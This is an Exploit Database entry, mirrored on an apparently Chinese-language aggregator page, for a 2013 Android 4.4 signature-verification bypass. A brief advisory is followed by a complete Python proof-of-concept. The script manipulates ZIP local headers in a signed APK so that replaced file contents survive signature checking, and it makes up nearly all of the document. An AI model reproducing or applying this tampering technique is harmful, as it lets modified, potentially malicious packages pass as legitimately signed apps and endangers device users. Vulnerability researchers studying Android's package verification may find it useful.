Google Android – Signature Verification Security Bypass

• Exploit Database
• 131 阅读

• 作者： Jay Freeman
  日期： 2013-11-04
• 类别：

  • remote
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/38821/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

  source: https://www.securityfocus.com/bid/63547/info   Google Android is prone to a security-bypass vulnerability.   Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.   Android 4.4 is vulnerable; other versions may also be affected.   #!/usr/bin/python   import zipfile import struct import sys   # usage: ./pocB.py new.apk old.apk file data zout = zipfile.ZipFile(sys.argv[1], "w") zin = zipfile.ZipFile(sys.argv[2], "r") replace = sys.argv[3] new = open(sys.argv[4], &apos;r&apos;).read()   fp = zout.fp   for name in zin.namelist(): old = zin.read(name) if name != replace: zout.writestr(name, old, zipfile.ZIP_DEFLATED) else: assert len(new) <= len(old)   # write header, old data, and record offset zout.writestr(name, old, zipfile.ZIP_STORED) offset = fp.tell()   # return to name length, set to skip old data fp.seek(-len(old) -len(name) -4, 1) fp.write(struct.pack(&apos;<h&apos;, len(name) + len(old)))   # after old data, write new data \0 padded fp.seek(offset) fp.write(new) fp.write(&apos;\0&apos; * (len(old) - len(new)))   zout.close() zin.close()